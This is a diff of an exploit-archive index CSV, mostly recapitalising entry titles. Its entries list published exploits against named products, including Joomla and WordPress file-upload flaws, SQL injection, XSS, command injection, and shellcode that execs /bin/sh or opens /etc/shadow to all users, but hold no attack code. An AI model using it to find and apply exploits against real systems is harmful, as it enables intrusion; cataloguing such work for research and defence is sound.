37378,platforms/php/webapps/37378.php,"Joomla! Simple SWFUpload Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37379,platforms/php/webapps/37379.php,"Joomla! Art Uploader Component - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37380,platforms/php/webapps/37380.php,"Joomla! DentroVideo Component - 'upload.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 37381,platforms/php/webapps/37381.html,"Joomla! IDoEditor Component - 'image.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 37382,platforms/php/webapps/37382.php,"Joomla! jFancy Component - 'script.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 37383,platforms/php/webapps/37383.php,"Joomla! Easy Flash Uploader Component - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 -37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 -37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OS X Yosemite 10.10.3 - Crash PoC",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 +37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0 +37386,platforms/osx/dos/37386.php,"Safari 8.0.X / OSX Yosemite 10.10.3 - Crash PoC",2015-06-26,"Mohammad Reza Espargham",osx,dos,0 37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Path Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0 -37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 -37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 +37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Persistent Cross-Site Scripting",2015-06-26,"Marco Delai",multiple,webapps,0 37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Persistent Cross-Site Scripting",2015-06-26,"Suraj Krishnaswami",windows,webapps,0 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0 37397,platforms/php/webapps/37397.html,"SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0 37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload",2012-06-13,KedAns-Dz,php,webapps,0 -37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 +37399,platforms/php/webapps/37399.php,"Wordpress Evarisk Plugin - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 -37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - Encoded execve shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 +37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - Encoded execve Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37429,platforms/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - 'aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote,0 -37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 +37403,platforms/php/webapps/37403.php,"Wordpress Invit0r Plugin - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting",2012-06-17,anonymous,php,webapps,0 37405,platforms/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote,0 -37406,platforms/php/webapps/37406.php,"WordPress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 +37406,platforms/php/webapps/37406.php,"Wordpress Zingiri Web Shop Plugin 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0 37409,platforms/php/webapps/37409.txt,"NetArt Media Jobs Portal - SQL Injection",2012-06-14,"Ibrahim El-Sayed",php,webapps,0 37410,platforms/php/webapps/37410.php,"Joomla! hwdVideoShare Component - 'flash_upload.php' Arbitrary File Upload",2012-06-17,"Sammy FORGIT",php,webapps,0 -37411,platforms/php/webapps/37411.txt,"WordPress Organizer Plugin - Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 +37411,platforms/php/webapps/37411.txt,"Wordpress Organizer Plugin - Multiple Security Vulnerabilities",2012-06-15,MustLive,php,webapps,0 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0 37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0 37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 -37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 -37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 -37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom Plugin - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 +37417,platforms/php/webapps/37417.php,"Wordpress Multiple Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 +37418,platforms/php/webapps/37418.php,"Wordpress LB Mixed Slideshow Plugin - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 +37419,platforms/php/webapps/37419.txt,"Wordpress Wp-ImageZoom Plugin - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 37420,platforms/php/webapps/37420.txt,"VANA CMS - 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 37566,platforms/php/dos/37566.php,"PHP 5.4.3 - PDO Memory Access Violation Denial of Service",2012-08-02,0x721427D8,php,dos,0 @@ -33777,7 +33777,7 @@ id,file,description,date,author,platform,type,port 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0 -37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - encoded execve shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 +37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - encoded execve Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 37428,platforms/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote,0 37430,platforms/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin - 'uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 @@ -33801,7 +33801,7 @@ id,file,description,date,author,platform,type,port 37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0 37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script - 'uploadify.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 -37452,platforms/php/webapps/37452.txt,"WordPress Flip Book Plugin - 'php.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 +37452,platforms/php/webapps/37452.txt,"Wordpress Flip Book Plugin - 'php.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 @@ -33813,7 +33813,7 @@ id,file,description,date,author,platform,type,port 37461,platforms/php/webapps/37461.txt,"DigPHP - 'dig.php' Script Remote File Disclosure",2012-06-26,"Ryuzaki Lawlet",php,webapps,0 37462,platforms/windows/dos/37462.pl,"VLC Media Player 2.0.1 - '.avi' File Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 37463,platforms/windows/dos/37463.pl,"Real Networks RealPlayer - '.avi' File Divide-By-Zero Denial of Service",2012-06-28,Dark-Puzzle,windows,dos,0 -37464,platforms/php/webapps/37464.txt,"WordPress Albo Pretorio Online 3.2 Plugin - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 +37464,platforms/php/webapps/37464.txt,"Wordpress Albo Pretorio Online 3.2 Plugin - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",php,webapps,80 37466,platforms/php/webapps/37466.php,"PHP-Fusion Advanced MP3 Player Infusion - 'upload.php' Arbitrary File Upload",2012-06-28,"Sammy FORGIT",php,webapps,0 37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0 37468,platforms/php/webapps/37468.php,"JAKCMS PRO 2.2.6 - 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",php,webapps,0 @@ -33829,29 +33829,29 @@ id,file,description,date,author,platform,type,port 37478,platforms/multiple/dos/37478.txt,"plow - '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injection",2012-07-04,snup,php,webapps,0 37480,platforms/windows/dos/37480.pl,"Solar FTP Server - Denial of Service",2012-07-05,coolkaveh,windows,dos,0 -37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 -37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin - 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat Plugin - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 +37481,platforms/php/webapps/37481.txt,"Wordpress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37482,platforms/php/webapps/37482.txt,"Wordpress custom tables Plugin - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 +37483,platforms/php/webapps/37483.txt,"Wordpress church_admin Plugin - 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37484,platforms/php/webapps/37484.txt,"Wordpress Knews Multilingual Newsletters Plugin - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37485,platforms/php/webapps/37485.txt,"Wordpress PHPFreeChat Plugin - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 37487,platforms/multiple/dos/37487.txt,"Apache Sling - Denial Of Service",2012-07-06,IOactive,multiple,dos,0 37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - Denial of Service PoC",2015-07-09,Arsyntex,linux,dos,0 -37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 +37563,platforms/php/webapps/37563.html,"Wordpress G-Lock Double Opt-in Manager Plugin - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Inject",2015-07-05,Vulnerability-Lab,ios,webapps,0 -37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 +37534,platforms/php/webapps/37534.txt,"Wordpress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0 -37494,platforms/php/webapps/37494.txt,"WordPress S3Bubble Cloud Video With Adverts & Analytics 0.7 Plugin - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 +37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 Plugin - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0 37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37500,platforms/php/webapps/37500.txt,"Funeral Script PHP - Cross-Site Scripting / SQL Injection",2012-06-17,snup,php,webapps,0 -37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 +37501,platforms/php/webapps/37501.rb,"Wordpress Generic Plugin - Arbitrary File Upload",2012-07-13,KedAns-Dz,php,webapps,0 37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board - Multiple SQL Injections",2012-07-15,ToXiC,php,webapps,0 37503,platforms/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 -37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 +37506,platforms/php/webapps/37506.php,"Wordpress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 37507,platforms/php/webapps/37507.txt,"web@all - 'name' Parameter Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS - 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 @@ -33859,7 +33859,7 @@ id,file,description,date,author,platform,type,port 37511,platforms/php/webapps/37511.txt,"AVA VoIP - Multiple Security Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",php,webapps,0 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - fileSystem.do Multiple Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 -37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80 +37514,platforms/php/webapps/37514.txt,"Wordpress ACF Frontend Display Plugin 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80 37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 @@ -33867,7 +33867,7 @@ id,file,description,date,author,platform,type,port 37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component - 'controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI Redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 -37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 +37522,platforms/php/webapps/37522.txt,"Wordpress chenpress Plugin - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free",2015-07-08,Metasploit,multiple,remote,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 - Service Disabling",2015-07-08,hyp3rlinx,windows,dos,0 @@ -33875,7 +33875,7 @@ id,file,description,date,author,platform,type,port 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 -37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 +37530,platforms/php/webapps/37530.txt,"Wordpress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 @@ -33900,8 +33900,8 @@ id,file,description,date,author,platform,type,port 37556,platforms/php/webapps/37556.txt,"Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0 -37559,platforms/php/webapps/37559.txt,"WordPress CP Image Store with Slideshow Plugin 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 -37560,platforms/php/webapps/37560.txt,"WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 +37559,platforms/php/webapps/37559.txt,"Wordpress CP Image Store with Slideshow Plugin 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 +37560,platforms/php/webapps/37560.txt,"Wordpress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 @@ -33925,7 +33925,7 @@ id,file,description,date,author,platform,type,port 37587,platforms/php/webapps/37587.txt,"GetSimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 -37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 +37590,platforms/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37591,platforms/php/webapps/37591.php,"AraDown - 'id' Parameter SQL Injection",2012-08-08,G-B,php,webapps,0 37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption PoC",2015-07-13,"SATHISH ARTHAR",windows,dos,0 @@ -33936,37 +33936,37 @@ id,file,description,date,author,platform,type,port 37598,platforms/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution",2015-07-13,Metasploit,multiple,remote,5900 37599,platforms/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free",2015-07-13,Metasploit,windows,remote,0 37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution",2015-07-13,Metasploit,multiple,remote,617 -37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 +37601,platforms/php/webapps/37601.txt,"Wordpress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80 37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80 -37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 +37603,platforms/php/webapps/37603.txt,"Wordpress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80 37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80 -37622,platforms/php/webapps/37622.txt,"WordPress Download Manager Free 2.7.94 & Pro 4 Plugin - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 +37622,platforms/php/webapps/37622.txt,"Wordpress Download Manager Free 2.7.94 & Pro 4 Plugin - Authenticated Persistent Cross-Site Scripting",2015-07-16,"Filippos Mastrogiannis",php,webapps,0 37607,platforms/windows/dos/37607.py,"Internet Download Manager - (.ief) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash PoC",2015-07-14,"Mohammad Reza Espargham",windows,dos,0 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0 37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0 37611,platforms/windows/remote/37611.php,"Impero Education Pro - SYSTEM Remote Command Execution",2015-07-14,slipstream,windows,remote,0 37612,platforms/windows/dos/37612.py,"ZOC Terminal Emulator 7 - (Quick Connection) Crash PoC",2015-07-14,"SATHISH ARTHAR",windows,dos,0 -37613,platforms/php/webapps/37613.txt,"PHPList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 +37613,platforms/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 